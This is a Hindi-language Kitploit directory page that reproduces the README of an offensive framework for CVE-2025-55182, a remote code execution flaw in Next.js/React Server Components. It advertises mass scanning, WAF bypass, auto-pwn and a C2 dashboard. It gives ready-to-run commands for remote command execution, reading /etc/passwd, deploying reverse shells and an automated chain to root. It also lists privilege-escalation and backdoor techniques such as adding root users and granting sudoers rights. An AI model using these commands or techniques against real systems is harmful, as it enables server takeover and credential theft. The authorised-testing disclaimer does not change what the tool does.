Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Cerberus-React2Shell-Scanner-Exploit — CVE-2025-55182 (React Server Components RCE) के लिए Elite exploitation टूलकिट। Async polymorphic payloads, उन्नत WAF/CDN बाईपास, proxy rotation, Shodan/Censys mass scan, auto-pwn + reverse shells, Nuclei templates, K8s lab और C2 dashboard। Sudeepa Wanigarathna द्वारा लिखित – केवल अधिकृत red team और penetration testing के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिभेद्यता स्कैनरशोषण फ्रेमवर्कशेलकोडवेब एप्लिकेशन शोषणपोस्ट-शोषणकमांड एंड कंट्रोललर्निंग और शिक्षा
रेड टीमिंग
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

रिपॉजिटरी देखें
21571 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2025-55182 (React Server Components RCE) के लिए Elite exploitation टूलकिट। Async polymorphic payloads, उन्नत WAF/CDN बाईपास, proxy rotation, Shodan/Censys mass scan, auto-pwn + reverse shells, Nuclei templates, K8s lab और C2 dashboard। Sudeepa Wanigarathna द्वारा लिखित – केवल अधिकृत red team और penetration testing के लिए।

साझा करें

Cerberus React2Shell - शस्त्रीकृत शोषण फ्रेमवर्क

  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 अवलोकन

Next.js Server Actions RCE भेद्यता (React2Shell) के लिए पेशेवर-ग्रेड शोषण फ्रेमवर्क। प्रारंभिक पहुंच से रूट विशेषाधिकार वृद्धि तक पूर्ण हमले की श्रृंखला प्रदर्शित करता है।

क्षमताएं:

  • ✅ स्वचालित भेद्यता पहचान
  • ✅ रिमोट कोड निष्पादन (RCE)
  • ✅ इंटरैक्टिव शेल पहुंच
  • ✅ Linux सिस्टम गणना
  • ✅ स्वचालित विशेषाधिकार वृद्धि
  • ✅ रिवर्स शेल तैनाती
  • ✅ फ़ाइल अपलोड/डाउनलोड
  • ✅ रूट पहुंच प्रदर्शन

🚀 त्वरित प्रारंभ

बेसिक RCE

# भेद्यता जांचें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# कमांड निष्पादित करें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

इंटरैक्टिव शेल

python3 interactive_shell.py --target http://127.0.0.1:3000

पूर्ण स्वचालित हमला श्रृंखला

# पूर्ण शोषण: RCE → गणना → रूट पहुंच
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 फ्रेमवर्क संरचना

Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # कोर शोषण इंजन (400+ लाइनें)
├── demo_exploit.py              # स्वचालित हमला श्रृंखला (290+ लाइनें)
├── interactive_shell.py         # इंटरैक्टिव शेल (280+ लाइनें)
├── reverse_shell_handler.py     # रिवर्स शेल लिसनर (180+ लाइनें)
├── post_exploit/
│   ├── linux_enum.py           # सिस्टम गणना (330+ लाइनें)
│   ├── priv_esc.py             # विशेषाधिकार वृद्धि (320+ लाइनें)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # पूर्ण उपयोग दस्तावेज़ीकरण
├── QUICKSTART.md                # त्वरित संदर्भ
└── BANNER.txt

🔥 विशेषताएं

कोर शोषण इंजन

  • एक्शन आईडी खोज: JavaScript बंडलों से स्वचालित निष्कर्षण
  • एकाधिक पेलोड: execSync, spawn, eval, mainModule वेरिएंट
  • आउटपुट निष्कर्षण: त्रुटि प्रतिक्रियाओं से कमांड आउटपुट पार्स करें
  • WAF बाईपास: पेलोड अस्पष्टीकरण तकनीकें

पोस्ट-शोषण

  • Linux गणना: SUID/SGID बाइनरी, लिखने योग्य पथ, क्रॉन जॉब्स, कर्नेल संस्करण
  • विशेषाधिकार वृद्धि: GTFOBins, लिखने योग्य /etc फ़ाइलें, Docker एस्केप, क्षमताएं
  • फ़ाइल संचालन: base64 एन्कोडिंग के साथ अपलोड/डाउनलोड
  • स्थिरता: एकाधिक बैकडोर विधियां

इंटरैक्टिव उपकरण

  • इंटरैक्टिव शेल: अंतर्निहित कमांड के साथ वास्तविक समय कमांड निष्पादन
  • रिवर्स शेल: एकाधिक शेल प्रकार (bash, python, nc, perl)
  • डेमो मोड: 6-चरणीय स्वचालित प्रदर्शन

📖 उपयोग उदाहरण

1. बेसिक कमांड

# भेद्यता जांच
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# कमांड निष्पादित करें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# विभिन्न पेलोड वेरिएंट
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# अस्पष्टीकरण के साथ
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. इंटरैक्टिव शेल

# शेल लॉन्च करें
python3 interactive_shell.py --target http://127.0.0.1:3000

# उपलब्ध कमांड:
# - execute <cmd>        : शेल कमांड निष्पादित करें
# - enum                 : पूर्ण गणना चलाएं
# - escalate             : विशेषाधिकार वृद्धि का प्रयास करें
# - upload <local> <remote>  : फ़ाइल अपलोड करें
# - download <remote> <local>: फ़ाइल डाउनलोड करें
# - shell <lhost> <lport>: रिवर्स शेल तैनात करें
# - info                 : सत्र जानकारी दिखाएं
# - exit                 : बाहर निकलें

3. रिवर्स शेल

# टर्मिनल 1: लिसनर शुरू करें
python3 reverse_shell_handler.py --lport 4444

# टर्मिनल 2: शेल तैनात करें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. स्वचालित डेमो

# पूर्ण श्रृंखला: खोज → RCE → गणना → रूट
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 हमला श्रृंखला

फ्रेमवर्क पूर्ण 6-चरणीय शोषण श्रृंखला लागू करता है:

  1. खोज - JavaScript बंडलों से Server Action IDs निकालें
  2. शोषण - कार्यशील Action ID खोजें और RCE प्राप्त करें
  3. सत्यापन - id कमांड के साथ कोड निष्पादन की पुष्टि करें
  4. गणना - सिस्टम जानकारी, SUID बाइनरी, लिखने योग्य पथ एकत्र करें
  5. वृद्धि - विशेषाधिकार वृद्धि वेक्टरों का स्वचालित शोषण करें
  6. प्रदर्शन - /etc/shadow पढ़कर और /root सूचीबद्ध करके रूट पहुंच साबित करें

🛡️ विशेषाधिकार वृद्धि तकनीकें

कार्यान्वित विधियां

  1. SUID बाइनरी (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. लिखने योग्य /etc फ़ाइलें

    • /etc/passwd - नया रूट उपयोगकर्ता जोड़ें
    • /etc/shadow - रूट पासवर्ड साफ़ करें
    • /etc/sudoers - NOPASSWD sudo अनुदान दें
  3. Docker एस्केप

    • सुलभ Docker सॉकेट शोषण
    • विशेषाधिकार प्राप्त कंटेनर ब्रेकआउट
  4. कर्नेल शोषण

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Linux क्षमताएं

    • CAP_SETUID, CAP_DAC_OVERRIDE शोषण

📊 आंकड़े

  • कोड की कुल लाइनें: 1,800+
  • मॉड्यूल: 8
  • विशेषाधिकार वृद्धि तकनीकें: 5
  • पेलोड वेरिएंट: 4
  • शेल प्रकार: 4 (bash, python, nc, perl)

⚙️ आवश्यकताएं

pip install -r requirements.txt

निर्भरताएं:

  • requests
  • colorama

📚 दस्तावेज़ीकरण

  • EXPLOITATION_GUIDE.md - उदाहरणों के साथ पूर्ण उपयोग मार्गदर्शिका
  • QUICKSTART.md - सामान्य कमांड के लिए त्वरित संदर्भ

⚠️ अस्वीकरण

चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। केवल उन सिस्टम पर उपयोग करें जिनके मालिक आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। अपने जोखिम पर उपयोग करें।

🎓 शैक्षिक उद्देश्य

यह फ्रेमवर्क निम्नलिखित के लिए डिज़ाइन किया गया है:

  • Next.js भेद्यताओं का अध्ययन करने वाले सुरक्षा शोधकर्ता
  • अधिकृत पेनेट्रेशन परीक्षक
  • सुरक्षा प्रशिक्षण और CTF चुनौतियां
  • नियंत्रित प्रयोगशाला वातावरण में भेद्यता अनुसंधान

📄 लाइसेंस

MIT लाइसेंस (केवल शैक्षिक उद्देश्य)

👤 लेखक

Sudeepa Wanigarathna

  • शोषण विकास में विशेषज्ञ
  • सुरक्षा शोधकर्ता
  • पेनेट्रेशन परीक्षक

संस्करण: 1.0
अंतिम अद्यतन: दिसंबर 2025

विस्तृत उपयोग निर्देशों के लिए, EXPLOITATION_GUIDE.md देखें

टूल डाउनलोड करें